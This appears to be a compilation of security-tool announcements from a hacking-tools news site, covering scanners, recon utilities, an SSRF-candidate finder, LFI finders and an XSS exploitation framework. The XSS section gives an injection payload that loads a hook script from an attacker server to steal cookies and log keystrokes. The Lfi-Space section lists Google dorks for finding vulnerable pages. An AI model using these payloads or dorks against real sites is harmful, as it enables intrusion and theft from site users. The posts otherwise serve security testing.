Web Path Finder is a Python program that provides information about a website. It retrieves various details such as page title, last updated date, DNS information, subdomains, firewall names, technologies used, certificate information, and more.Β 


  • Retrieve important information about a website
  • Gain insights into the technologies used by a website
  • Identify subdomains and DNS information
  • Check firewall names and certificate details
  • Perform bypass operations for captcha and JavaScript content

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/PathFinder.git
  2. Install the required packages:

    pip install -r requirements.txt

This will install all the required modules and their respective versions.

Run the program using the following command:

Ò”ŒÒ”€Ò”€(root💀denizhalil)-[~/MyProjects/]
Ò””Ò”€# python3 web-info-explorer.py --help
usage: wpathFinder.py [-h] url

Web Information Program

positional arguments:
url Enter the site URL

options:
-h, --help show this help message and exit

Replace <url> with the URL of the website you want to explore.

Here is an example output of running the program:

Ò”ŒÒ”€Ò”€(root💀denizhalil)-[~/MyProjects/]
Ò””Ò”€# python3 pathFinder.py https://www.facebook.com/
Site Information:
Title: Facebook - Login or Register
Last Updated Date: None
First Creation Date: 1997-03-29 05:00:00
Dns Information: []
Sub Branches: ['157']
Firewall Names: []
Technologies Used: javascript, php, css, html, react
Certificate Information:
Certificate Issuer: US
Certificate Start Date: 2023-02-07 00:00:00
Certificate Expiration Date: 2023-05-08 23:59:59
Certificate Validity Period (Days): 90
Bypassed JavaScript content:
</ div>

Contributions are welcome! To contribute to PathFinder, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

  • Thank you my friend Varol

This project is licensed under the MIT License - see the LICENSE file for details.

For any inquiries or further information, you can reach me through the following channels:



Sirius - First Truly Open-Source General Purpose Vulnerability Scanner

By: Zion3R


Sirius is the first truly open-source general purpose vulnerability scanner. Today, the information security community remains the best and most expedient source for cybersecurity intelligence. The community itself regularly outperforms commercial vendors. This is the primary advantage Sirius Scan intends to leverage.

The framework is built around four general vulnerability identification concepts: The vulnerability database, network vulnerability scanning, agent-based discovery, and custom assessor analysis. With these powers combined around an easy to use interface Sirius hopes to enable industry evolution.


Getting Started

To run Sirius clone this repository and invoke the containers with docker-compose. Note that both docker and docker-compose must be installed to do this.

git clone https://github.com/SiriusScan/Sirius.git
cd Sirius
docker-compose up

Logging in

The default username and password for Sirius is: admin/sirius

Services

The system is composed of the following services:

  • Mongo: a NoSQL database used to store data.
  • RabbitMQ: a message broker used to manage communication between services.
  • Sirius API: the API service which provides access to the data stored in Mongo.
  • Sirius Web: the web UI which allows users to view and manage their data pipelines.
  • Sirius Engine: the engine service which manages the execution of data pipelines.

Usage

To use Sirius, first start all of the services by running docker-compose up. Then, access the web UI at localhost:5173.

Remote Scanner

If you would like to setup Sirius Scan on a remote machine and access it you must modify the ./UI/config.json file to include your server details.

Good Luck! Have Fun! Happy Hacking!



DakshSCRA - Source Code Review Assist

By: Zion3R


Daksh SCRA (Source Code Review Assist) tool is built to enhance the efficiency of the source code review process, providing a well-structured and organized approach for code reviewers.

Rather than indiscriminately flagging everything as a potential issue, Daksh SCRA promotes thoughtful analysis, urging the investigation and confirmation of potential problems. This approach mitigates the scramble to tag every potential concern as a bug, cutting back on the confusion and wasted time spent on false positives.

What sets Daksh SCRA apart is its emphasis on avoiding unnecessary bug tagging. Unlike conventional methods, it advocates for thorough investigation and confirmation of potential issues before tagging them as bugs. This approach helps mitigate the issue of false positives, which often consume valuable time and resources, thereby fostering a more productive and efficient code review process.


Debut

Daksh SCRA was initially introduced during a source code review training session I conducted at Black Hat USA 2022 (August 6 - 9), where it was subtly presented to a specific audience. However, this introduction was carried out with a low-profile approach, avoiding any major announcements.

While this tool was quietly published on GitHub after the 2022 training, its official public debut took place at Black Hat USA 2023 in Las Vegas.

Features and Functionalities

Distinctive Features (Multiple World’s First)

  • Identifies Areas of Interest in Source Code: Encourage focused investigation and confirmation rather than indiscriminately labeling everything as a bug.

  • Identifies Areas of Interest in File Paths (World’s First): Recognises patterns in file paths to pinpoint relevant sections for review.

  • Software-Level Reconnaissance to Identify Technologies Utilised: Identifies project technologies, enabling code reviewers to conduct precise scans with appropriate rules.

  • Automated Scientific Effort Estimation for Code Review (World’s First): Providing a measurable approach for estimating efforts required for a code review process.

Although this tool has progressed beyond its early stages, it has reached a functional state that is quite usable and delivers on its promised capabilities. Nevertheless, active enhancements are currently underway, and there are multiple new features and improvements expected to be added in the upcoming months.

Additionally, the tool offers the following functionalities:

  • Options to use platform-specific rules specific for finding areas of interests
  • Options to extend or add new rules for any new or existing languages
  • Generates report in text, HTML and PDF format for inspection

Refer to the wiki for the tool setup and usage details - https://github.com/coffeeandsecurity/DakshSCRA/wiki

Feel free to contribute towards updating or adding new rules and future development.

If you find any bugs, report them to d3basis.m0hanty@gmail.com.

Tool Setup

Pre-requisites

Python3 and all the libraries listed in requirements.txt

Setting up environment to run this tool

1. Setup a virtual environment

$ pip install virtualenv

$ virtualenv -p python3 {name-of-virtual-env} // Create a virtualenv
Example: virtualenv -p python3 venv

$ source {name-of-virtual-env}/bin/activate // To activate virtual environment you just created
Example: source venv/bin/activate

After running the activate command you should see the name of your virtual env at the beginning of your terminal like this: (venv) $

2. Ensure all required libraries are installed within the virtual environment

You must run the below command after activating the virtual environment as mentioned in the previous steps.

pip install -r requirements.txt

Once the above step successfully installs all the required libraries, refer to the following tool usage commands to run the tool.

Tool Usage

$ python3 dakshscra.py -h // To view avaialble options and arguments

usage: dakshscra.py [-h] [-r RULE_FILE] [-f FILE_TYPES] [-v] [-t TARGET_DIR] [-l {R,RF}] [-recon] [-estimate]

options:
-h, --help show this help message and exit
-r RULE_FILE Specify platform specific rule name
-f FILE_TYPES Specify file types to scan
-v Specify verbosity level {'-v', '-vv', '-vvv'}
-t TARGET_DIR Specify target directory path
-l {R,RF}, --list {R,RF}
List rules [R] OR rules and filetypes [RF]
-recon Detects platform, framework and programming language used
-estimate Estimate efforts required for code review

Example Usage

$ python3 dakshscra.py // To view tool usage along with examples

Examples:
# '-f' is optional. If not specified, it will default to the corresponding filetypes of the selected rule.
dakshsca.py -r php -t /source_dir_path

# To override default settings, other filetypes can be specified with '-f' option.
dakshsca.py -r php -f dotnet -t /path_to_source_dir
dakshsca.py -r php -f custom -t /path_to_source_dir

# Perform reconnaissance and rule based scanning if '-recon' used with '-r' option.
dakshsca.py -recon -r php -t /path_to_source_dir

# Perform only reconnaissance if '-recon' used without the '-r' option.
dakshsca.py -recon -t /path_to_source_dir

# Verbosity: '-v' is default, '-vvv' will display all rules check within each rule category.
dakshsca.py -r php -vv -t /path_to_source_dir


Supported RULE_FILE: dotnet, java, php, javascript
Supported FILE_TY PES: dotnet, php, java, custom, allfiles

Reports

The tool generates reports in three formats: HTML, PDF, and TEXT. Although the HTML and PDF reports are still being improved, they are currently in a reasonably good state. With each subsequent iteration, these reports will continue to be refined and improved even further.

Scanning (Areas of Security Concerns) Report

HTML Report:
  • DakshSCRA/reports/html/report.html
PDF Report:
  • DakshSCRA/reports/html/report.pdf
RAW TEXT Based Reports:
  • Areas of Interest - Identified Patterns : DakshSCRA/reports/text/areas_of_interest.txt
  • Areas of Interest - Project Files: DakshSCRA/reports/text/filepaths_aoi.txt
  • Identified Project Files: DakshSCRA/runtime/filepaths.txt

Reconnaissance (Recon) Report

  • Reconnaissance Summary: /reports/text/recon.txt

Note: Currently, the reconnaissance report is created in a text format. However, in upcoming releases, the plan is to incorporate it into the vulnerability scanning report, which will be available in both HTML and PDF formats.

Code Review Effort Estimation Report

  • Effort estimation report: /reports/html/estimation.html

Note: At present, the effort estimation for the source code review is in its early stages. It is considered experimental and will be developed and refined through several iterations. Improvements will be made over multiple releases, as the formula and the concept are new and require time to be honed to achieve accuracy or reasonable estimation.

Currently, the report is generated in HTML format. However, in future releases, there are plans to also provide it in PDF format.



Callisto - An Intelligent Binary Vulnerability Analysis Tool

By: Zion3R


Callisto is an intelligent automated binary vulnerability analysis tool. Its purpose is to autonomously decompile a provided binary and iterate through the psuedo code output looking for potential security vulnerabilities in that pseudo c code. Ghidra's headless decompiler is what drives the binary decompilation and analysis portion. The pseudo code analysis is initially performed by the Semgrep SAST tool and then transferred to GPT-3.5-Turbo for validation of Semgrep's findings, as well as potential identification of additional vulnerabilities.


This tool's intended purpose is to assist with binary analysis and zero-day vulnerability discovery. The output aims to help the researcher identify potential areas of interest or vulnerable components in the binary, which can be followed up with dynamic testing for validation and exploitation. It certainly won't catch everything, but the double validation with Semgrep to GPT-3.5 aims to reduce false positives and allow a deeper analysis of the program.

For those looking to just leverage the tool as a quick headless decompiler, the output.c file created will contain all the extracted pseudo code from the binary. This can be plugged into your own SAST tools or manually analyzed.

I owe Marco Ivaldi @0xdea a huge thanks for his publicly released custom Semgrep C rules as well as his idea to automate vulnerability discovery using semgrep and pseudo code output from decompilers. You can read more about his research here: Automating binary vulnerability discovery with Ghidra and Semgrep

Requirements:

  • If you want to use the GPT-3.5-Turbo feature, you must create an API token on OpenAI and save to the config.txt file in this folder
  • Ghidra
  • Semgrep - pip install semgrep
  • requirements.txt - pip install -r requirements.txt
  • Ensure the correct path to your Ghidra directory is set in the config.txt file

To Run: python callisto.py -b <path_to_binary> -ai -o <path_to_output_file>

  • -ai => enable OpenAI GPT-3.5-Turbo Analysis. Will require placing a valid OpenAI API key in the config.txt file
  • -o => define an output file, if you want to save the output
  • -ai and -o are optional parameters
  • -all will run all functions through OpenAI Analysis, regardless of any Semgrep findings. This flag requires the prerequisite -ai flag
  • Ex. python callisto.py -b vulnProgram.exe -ai -o results.txt
  • Ex. (Running all functions through AI Analysis):
    python callisto.py -b vulnProgram.exe -ai -all -o results.txt

Program Output Example:



Surf - Escalate Your SSRF Vulnerabilities On Modern Cloud Environments

By: Zion3R


surf allows you to filter a list of hosts, returning a list of viable SSRF candidates. It does this by sending a HTTP request from your machine to each host, collecting all the hosts that did not respond, and then filtering them into a list of externally facing and internally facing hosts.

You can then attempt these hosts wherever an SSRF vulnerability may be present. Due to most SSRF filters only focusing on internal or restricted IP ranges, you'll be pleasantly surprised when you get SSRF on an external IP that is not accessible via HTTP(s) from your machine.

Often you will find that large companies with cloud environments will have external IPs for internal web apps. Traditional SSRF filters will not capture this unless these hosts are specifically added to a blacklist (which they usually never are). This is why this technique can be so powerful.


Installation

This tool requires go 1.19 or above as we rely on httpx to do the HTTP probing.

It can be installed with the following command:

go install github.com/assetnote/surf/cmd/surf@latest

Usage

Consider that you have subdomains for bigcorp.com inside a file named bigcorp.txt, and you want to find all the SSRF candidates for these subdomains. Here are some examples:

# find all ssrf candidates (including external IP addresses via HTTP probing)
surf -l bigcorp.txt
# find all ssrf candidates (including external IP addresses via HTTP probing) with timeout and concurrency settings
surf -l bigcorp.txt -t 10 -c 200
# find all ssrf candidates (including external IP addresses via HTTP probing), and just print all hosts
surf -l bigcorp.txt -d
# find all hosts that point to an internal/private IP address (no HTTP probing)
surf -l bigcorp.txt -x

The full list of settings can be found below:

❯ surf -h

β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β•
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•” β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘
β•šβ•β•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β• β•šβ•β•β•šβ•β•

by shubs @ assetnote

Usage: surf [--hosts FILE] [--concurrency CONCURRENCY] [--timeout SECONDS] [--retries RETRIES] [--disablehttpx] [--disableanalysis]

Options:
--hosts FILE, -l FILE
List of assets (hosts or subdomains)
--concurrency CONCURRENCY, -c CONCURRENCY
Threads (passed down to httpx) - default 100 [default: 100]
--timeout SECONDS, -t SECONDS
Timeout in seconds (passed down to httpx) - default 3 [default: 3]
--retries RETRIES, -r RETRIES
Retries on failure (passed down to httpx) - default 2 [default: 2]
--disablehttpx, -x Disable httpx and only output list of hosts that resolve to an internal IP address - default false [default: false]
--disableanalysis, -d
Disable analysis and only output list of hosts - default false [default: false]
--help, -h display this help and exit

Output

When running surf, it will print out the SSRF candidates to stdout, but it will also save two files inside the folder it is ran from:

  • external-{timestamp}.txt - Externally resolving, but unable to send HTTP requests to from your machine
  • internal-{timestamp}.txt - Internally resolving, and obviously unable to send HTTP requests from your machine

These two files will contain the list of hosts that are ideal SSRF candidates to try on your target. The external target list has higher chances of being viable than the internal list.

Acknowledgements

Under the hood, this tool leverages httpx to do the HTTP probing. It captures errors returned from httpx, and then performs some basic analysis to determine the most viable candidates for SSRF.

This tool was created as a result of a live hacking event for HackerOne (H1-4420 2023).



HackBot - A Simple Cli Chatbot Having Llama2 As Its Backend Chat AI

By: Zion3R


Welcome to HackBot, an AI-powered cybersecurity chatbot designed to provide helpful and accurate answers to your cybersecurity-related queries and also do code analysis and scan analysis. Whether you are a security researcher, an ethical hacker, or just curious about cybersecurity, HackBot is here to assist you in finding the information you need.

HackBot utilizes the powerful language model Meta-LLama2 through the "LlamaCpp" library. This allows HackBot to respond to your questions in a coherent and relevant manner. Please make sure to keep your queries in English and adhere to the guidelines provided to get the best results from HackBot.


Features

  • AI Cybersecurity Chat: HackBot can answer various cybersecurity-related queries, helping you with penetration testing, security analysis, and more.
  • Interactive Interface: The chatbot provides an interactive command-line interface, making it easy to have conversations with HackBot.
  • Clear Output: HackBot presents its responses in a well-formatted markdown, providing easily readable and organized answers.
  • Static Code Analysis: Utilizes the provided scan data or log file for conducting static code analysis. It thoroughly examines the source code without executing it, identifying potential vulnerabilities, coding errors, and security issues.
  • Vulnerability Analysis: Performs a comprehensive vulnerability analysis using the provided scan data or log file. It identifies and assesses security weaknesses, misconfigurations, and potential exploits present in the target system or network.

How it looks

Chat:

Static Code analysis:

Vulnerability analysis:

Installation

Prerequisites

Before you proceed with the installation, ensure you have the following prerequisites:

Step 1: Clone the Repository

git clone https://github.com/morpheuslord/hackbot.git
cd hackbot

Step 2: Install Dependencies

pip install -r requirements.txt

Step 3: Download the AI Model

python hackbot.py

The first time you run HackBot, it will check for the AI model required for the chatbot. If the model is not present, it will be automatically downloaded and saved as "llama-2-7b-chat.ggmlv3.q4_0.bin" in the project directory.

Usage

To start a conversation with HackBot, run the following command:

python hackbot.py

HackBot will display a banner and wait for your input. You can ask cybersecurity-related questions, and HackBot will respond with informative answers. To exit the chat, simply type "quit_bot" in the input prompt.

Here are some additional commands you can use:

  • clear_screen: Clears the console screen for better readability.
  • quit_bot: This is used to quit the chat application
  • bot_banner: Prints the default bots banner.
  • contact_dev: Provides my contact information.
  • save_chat: Saves the current sessions interactions.
  • vuln_analysis: Does a Vuln analysis using the scan data or log file.
  • static_code_analysis: Does a Static code analysis using the scan data or log file.

Note: I am working on more addons and more such commands to give a more chatGPT experience

Please Note: HackBot's responses are based on the Meta-LLama2 AI model, and its accuracy depends on the quality of the queries and data provided to it.

I am also working on AI training by which I can teach it how to be more accurately tuned to work for hackers on a much more professional level.

Contributing

We welcome contributions to improve HackBot's functionality and accuracy. If you encounter any issues or have suggestions for enhancements, please feel free to open an issue or submit a pull request. Follow these steps to contribute:

  1. Fork the repository.
  2. Create a new branch with a descriptive name.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request to the main branch of this repository.

Please maintain a clean commit history and adhere to the project's coding guidelines.

AI training

If anyone with the know-how of training text generation models can help improve the code.

Contact

For any questions, feedback, or inquiries related to HackBot, feel free to contact the project maintainer:



LFI-FINDER - Tool Focuses On Detecting Local File Inclusion (LFI) Vulnerabilities

By: Zion3R

Written by TMRSWRR

Version 1.0.0

Instagram: TMRSWRR


How to use

LFI-FINDER is an open-source tool available on GitHub that focuses on detecting Local File Inclusion (LFI) vulnerabilities. Local File Inclusion is a common security vulnerability that allows an attacker to include files from a web server into the output of a web application. This tool automates the process of identifying LFI vulnerabilities by analyzing URLs and searching for specific patterns indicative of LFI. It can be a useful addition to a security professional's toolkit for detecting and addressing LFI vulnerabilities in web applications.

This tool works with geckodriver, search url for LFI Vuln and when get an root text on the screen, it notifies you of the successful payload.

Installation

git clone https://github.com/capture0x/LFI-FINDER/
cd LFI-FINDER
bash setup.sh
pip3 install -r requirements.txt
chmod -R 755 lfi.py
python3 lfi.py

THIS IS FOR LATEST GOOGLE CHROME VERSION

Bugs and enhancements

For bug reports or enhancements, please open an issue here.

Copyright 2023



Artemis - APK Infrastructure Investigator

By: Zion3R

Overview

A tools for Find APK Infrastructure .

HADESS performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organized our activities around the prevention of corporate, industrial, and laboratory cyber threats.


Installation

pip install -r requirements.txt  
python main.py

Command Line Options

          
--help Display help
--path Required path of apk file
--manifest Display manifest informations
--infra Find all infra addresses included ip,domain ex. --infra ip,domain
--whoise Whoise all infra included ip,domain ex. --whoise ip,domain
--output Set output files ex. --output out.txt

Usage

Display Manifest

APK Infrastructure Investigator (3)

IP Whois

APK Infrastructure Investigator (4)

Example Usage:

1.Find infra(domain and ip) in sample4.apk and set output result into out.txt

python3 main.py --path sample4.apk --infra domain,ip --output out.txt
  1. Investigate the Domain and IP on the APK
python3 main.py --path sample.apk --whois ip


Artemis - A Modular Web Reconnaissance Tool And Vulnerability Scanner

By: Zion3R


A modular web reconnaissance tool and vulnerability scanner based on Karton (https://github.com/CERT-Polska/karton).

The Artemis project has been initiated by the KN Cyber science club of Warsaw University of Technology and is currently being maintained by CERT Polska.

Artemis is experimental software, under active development - use at your own risk.

Features

For an up-to-date list of features, please refer to the documentation.

Development

Tests

To run the tests, use:

./scripts/test

Code formatting

Artemis uses pre-commit to run linters and format the code. pre-commit is executed on CI to verify that the code is formatted properly.

To run it locally, use:

pre-commit run --all-files

To setup pre-commit so that it runs before each commit, use:

pre-commit install

Building the docs

To build the documentation, use:

cd docs
python3 -m venv venv
. venv/bin/activate
pip install -r requirements.txt
make html

How do I write my own module?

Please refer to the documentation.

Contributing

Contributions are welcome! We will appreciate both ideas for new Artemis modules (added as GitHub issues) as well as pull requests with new modules or code improvements.

However obvious it may seem we kindly remind you that by contributing to Artemis you agree that the BSD 3-Clause License shall apply to your input automatically, without the need for any additional declarations to be made.



Scanner-and-Patcher - A Web Vulnerability Scanner And Patcher

By: Zion3R


This tools is very helpful for finding vulnerabilities present in the Web Applications.

  • A web application scanner explores a web application by crawling through its web pages and examines it for security vulnerabilities, which involves generation of malicious inputs and evaluation of application's responses.
    • These scanners are automated tools that scan web applications to look for security vulnerabilities. They test web applications for common security problems such as cross-site scripting (XSS), SQL injection, and cross-site request forgery (CSRF).
    • This scanner uses different tools like nmap, dnswalk, dnsrecon, dnsenum, dnsmap etc in order to scan ports, sites, hosts and network to find vulnerabilites like OpenSSL CCS Injection, Slowloris, Denial of Service, etc.

Tools Used

Serial No. Tool Name Serial No. Tool Name
1 whatweb 2 nmap
3 golismero 4 host
5 wget 6 uniscan
7 wafw00f 8 dirb
9 davtest 10 theharvester
11 xsser 12 fierce
13 dnswalk 14 dnsrecon
15 dnsenum 16 dnsmap
17 dmitry 18 nikto
19 whois 20 lbd
21 wapiti 22 devtest
23 sslyze

Working

Phase 1

  • User has to write:- "python3 web_scan.py (https or http) ://example.com"
  • At first program will note initial time of running, then it will make url with "www.example.com".
  • After this step system will check the internet connection using ping.
  • Functionalities:-
    • To navigate to helper menu write this command:- --help for update --update
    • If user want to skip current scan/test:- CTRL+C
    • To quit the scanner use:- CTRL+Z
    • The program will tell scanning time taken by the tool for a specific test.

Phase 2

  • From here the main function of scanner will start:
  • The scanner will automatically select any tool to start scanning.
  • Scanners that will be used and filename rotation (default: enabled (1)
  • Command that is used to initiate the tool (with parameters and extra params) already given in code
  • After founding vulnerability in web application scanner will classify vulnerability in specific format:-
    • [Responses + Severity (c - critical | h - high | m - medium | l - low | i - informational) + Reference for Vulnerability Definition and Remediation]
    • Here c or critical defines most vulnerability wheres l or low is for least vulnerable system

Definitions:-

  • Critical:- Vulnerabilities that score in the critical range usually have most of the following characteristics: Exploitation of the vulnerability likely results in root-level compromise of servers or infrastructure devices.Exploitation is usually straightforward, in the sense that the attacker does not need any special authentication credentials or knowledge about individual victims, and does not need to persuade a target user, for example via social engineering, into performing any special functions.

  • High:- An attacker can fully compromise the confidentiality, integrity or availability, of a target system without specialized access, user interaction or circumstances that are beyond the attacker’s control. Very likely to allow lateral movement and escalation of attack to other systems on the internal network of the vulnerable application. The vulnerability is difficult to exploit. Exploitation could result in elevated privileges. Exploitation could result in a significant data loss or downtime.

  • Medium:- An attacker can partially compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker’s control may be required for an attack to succeed. Very likely to be used in conjunction with other vulnerabilities to escalate an attack.Vulnerabilities that require the attacker to manipulate individual victims via social engineering tactics. Denial of service vulnerabilities that are difficult to set up. Exploits that require an attacker to reside on the same local network as the victim. Vulnerabilities where exploitation provides only very limited access. Vulnerabilities that require user privileges for successful exploitation.

  • Low:- An attacker has limited scope to compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker’s control is required for an attack to succeed. Needs to be used in conjunction with other vulnerabilities to escalate an attack.

  • Info:- An attacker can obtain information about the web site. This is not necessarily a vulnerability, but any information which an attacker obtains might be used to more accurately craft an attack at a later date. Recommended to restrict as far as possible any information disclosure.

  • CVSS V3 SCORE RANGE SEVERITY IN ADVISORY
    0.1 - 3.9 Low
    4.0 - 6.9 Medium
    7.0 - 8.9 High
    9.0 - 10.0 Critical

Vulnerabilities

  • After this scanner will show results which inclues:
    • Response time
    • Total time for scanning
    • Class of vulnerability

Remediation

  • Now, Scanner will tell about harmful effects of that specific type vulnerabilility.
  • Scanner tell about sources to know more about the vulnerabilities. (websites).
  • After this step, scanner suggests some remdies to overcome the vulnerabilites.

Phase 3

  • Scanner will Generate a proper report including
    • Total number of vulnerabilities scanned
    • Total number of vulnerabilities skipped
    • Total number of vulnerabilities detected
    • Time taken for total scan
    • Details about each and every vulnerabilites.
  • Writing all scan files output into SA-Debug-ScanLog for debugging purposes under the same directory
  • For Debugging Purposes, You can view the complete output generated by all the tools named SA-Debug-ScanLog.

Use

Use Program as python3 web_scan.py (https or http) ://example.com
--help
--update
Serial No. Vulnerabilities to Scan Serial No. Vulnerabilities to Scan
1 IPv6 2 Wordpress
3 SiteMap/Robot.txt 4 Firewall
5 Slowloris Denial of Service 6 HEARTBLEED
7 POODLE 8 OpenSSL CCS Injection
9 FREAK 10 Firewall
11 LOGJAM 12 FTP Service
13 STUXNET 14 Telnet Service
15 LOG4j 16 Stress Tests
17 WebDAV 18 LFI, RFI or RCE.
19 XSS, SQLi, BSQL 20 XSS Header not present
21 Shellshock Bug 22 Leaks Internal IP
23 HTTP PUT DEL Methods 24 MS10-070
25 Outdated 26 CGI Directories
27 Interesting Files 28 Injectable Paths
29 Subdomains 30 MS-SQL DB Service
31 ORACLE DB Service 32 MySQL DB Service
33 RDP Server over UDP and TCP 34 SNMP Service
35 Elmah 36 SMB Ports over TCP and UDP
37 IIS WebDAV 38 X-XSS Protection

Installation

git clone https://github.com/Malwareman007/Scanner-and-Patcher.git
cd Scanner-and-Patcher/setup
python3 -m pip install --no-cache-dir -r requirements.txt

Screenshots of Scanner

Contributions

Template contributions , Feature Requests and Bug Reports are more than welcome.

Authors

GitHub: @Malwareman007
GitHub: @Riya73
GitHub:@nano-bot01

Contributing

Contributions, issues and feature requests are welcome!
Feel free to check issues page.



XSS-Exploitation-Tool - An XSS Exploitation Tool

By: Zion3R


XSS Exploitation Tool is a penetration testing tool that focuses on the exploit of Cross-Site Scripting vulnerabilities.

This tool is only for educational purpose, do not use it against real environment


Features

  • Technical Data about victim browser
  • Geolocation of the victim
  • Snapshot of the hooked/visited page
  • Source code of the hooked/visited page
  • Exfiltrate input field data
  • Exfiltrate cookies
  • Keylogging
  • Display alert box
  • Redirect user

Installation

Tested on Debian 11

You may need Apache, Mysql database and PHP with modules:

$ sudo apt-get install apache2 default-mysql-server php php-mysql php-curl php-dom
$ sudo rm /var/www/index.html

Install Git and pull the XSS-Exploitation-Tool source code:

$ sudo apt-get install git

$ cd /tmp
$ git clone https://github.com/Sharpforce/XSS-Exploitation-Tool.git
$ sudo mv XSS-Exploitation-Tool/* /var/www/html/

Install composer, then install the application dependencies:

$ sudo apt-get install composer
$ cd /var/www/html/
$ sudo chown -R $your_debian_user:$your_debian_user /var/www/
$ composer install
$ sudo chown -R www-data:$www-data /var/www/

Init the database

$ sudo mysql

Creating a new user with specific rights:

MariaDB [(none)]> grant all on *.* to xet@localhost identified by 'xet';
Query OK, 0 rows affected (0.00 sec)

MariaDB [(none)]> flush privileges;
Query OK, 0 rows affected (0.00 sec)

MariaDB [(none)]> quit
Bye

Creating the database (will result in an empty page):

Visit the page http://server-ip/reset_database.php

Adapt the javascript hook file

The file hook.js is a hook. You need to replace the ip address in the first line with the XSS Exploitation Tool server ip address:

var address = "your server ip";

How it works

First, create a page (or exploit a Cross-Site Scripting vulnerability) to insert the Javascript hook file (see exploit.html at the root dir):

?vulnerable_param=<script src="http://your_server_ip/hook.js"/>

Then, when victims visit the hooked page, the XSS Exploitation Tool server should list the hooked browsers:

Screenshots



Lfi-Space - LFI Scan Tool

By: Zion3R

Written by TMRSWRR

Version 1.0.0

All in one tools for LFI VULN FINDER -LFI DORK FINDER

Instagram: TMRSWRR


Screenshots


How to use


Read Me

LFI Space is a robust and efficient tool designed to detect Local File Inclusion (LFI) vulnerabilities in web applications. This tool simplifies the process of identifying potential security flaws by leveraging two distinct scanning methods: Google Dork Search and Targeted URL Scan. With its comprehensive approach, LFI Space assists security professionals, penetration testers, and ethical hackers in assessing the security posture of web applications.

The Google Dork Search functionality within LFI Space harnesses the power of the Google search engine to identify web pages that may be susceptible to LFI attacks. By employing carefully crafted Google dorks, the tool retrieves search results that are likely to contain vulnerable pages. These dorks are specific queries designed to target common LFI vulnerability patterns in web applications. LFI Space then analyzes the responses from these pages, meticulously examining the content to identify any signs of LFI vulnerabilities. This approach allows for a broad and automated search, rapidly surfacing potential targets for further investigation.

Additionally, LFI Space provides a Targeted URL Scan feature, enabling users to manually input a list of specific URLs for scanning. This functionality allows for a more focused approach, enabling security professionals to assess particular web applications or pages of interest. By scanning each URL individually, LFI Space thoroughly inspects the target web pages for any signs of LFI vulnerabilities. This targeted approach provides flexibility and precision in identifying potential security weaknesses.

It is important to note that LFI Space is intended for responsible and authorized use, such as security testing, vulnerability assessments, or penetration testing, with proper consent and legal permissions. It is crucial to adhere to ethical guidelines and respect the privacy and security of targeted systems.

In conclusion, LFI Space is a powerful tool that combines Google Dork Search and Targeted URL Scan functionalities to detect Local File Inclusion vulnerabilities in web applications. By automating the search for potentially vulnerable pages and providing the ability to scan specific URLs, LFI Space empowers security professionals to identify LFI vulnerabilities effectively. With its user-friendly interface and comprehensive scanning capabilities, LFI Space is an invaluable asset for enhancing the security posture of web applications.

  • Google Dork Search: The tool queries the Google search engine to find web pages that may be vulnerable to LFI attacks based on carefully crafted Google dorks. It then analyzes the responses of these pages to determine if any LFI vulnerabilities exist.
  • Targeted URL Scan: The tool accepts a list of URLs as input and scans each URL for LFI vulnerabilities. This feature allows for a more focused approach, enabling users to assess specific web applications or pages of interest.

LFI Find Dork

inurl:/filedown.php?file=
inurl:/news.php?include=
inurl:/view/lang/index.php?page=?page=
inurl:/shared/help.php?page=
inurl:/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
inurl:/squirrelcart/cart_content.php?cart_isp_root=
inurl:index2.php?to=
inurl:index.php?load=
inurl:home.php?pagina=
/surveys/survey.inc.php?path=
index.php?body=
/classes/adodbt/sql.php?classes_dir=
enc/content.php?Home_Path=
  • This dork list in lfi2.txt file

Installation

Installation with requirements.txt

git clone https://github.com/capture0x/Lfi-Space/
cd Lfi-Space
pip3 install -r requirements.txt

Usage

python3 lfi.py

Bugs and enhancements

Contributions are welcome! If you find any issues or have suggestions for improvements, please open an issue or submit a pull request.

For bug reports or enhancements, please open an issue here.

Copyright 2023



Metlo - An Open-Source API Security Platform

By: Zion3R

Secure Your API.


Metlo is an open-source API security platform

With Metlo you can:

  • Create an Inventory of all your API Endpoints and Sensitive Data.
  • Detect common API vulnerabilities.
  • Proactively test your APIs before they go into production.
  • Detect API attacks in real time.

Metlo does this by scanning your API traffic using one of our connectors and then analyzing trace data.


There are three ways to get started with Metlo. Metlo Cloud, Metlo Self Hosted, and our Open Source product. We recommend Metlo Cloud for almost all users as it scales to 100s of millions of requests per month and all upgrades and migrations are managed for you.

You can get started with Melto Cloud right away without a credit card. Just make an account on https://app.metlo.com and follow the instructions in our docs here.

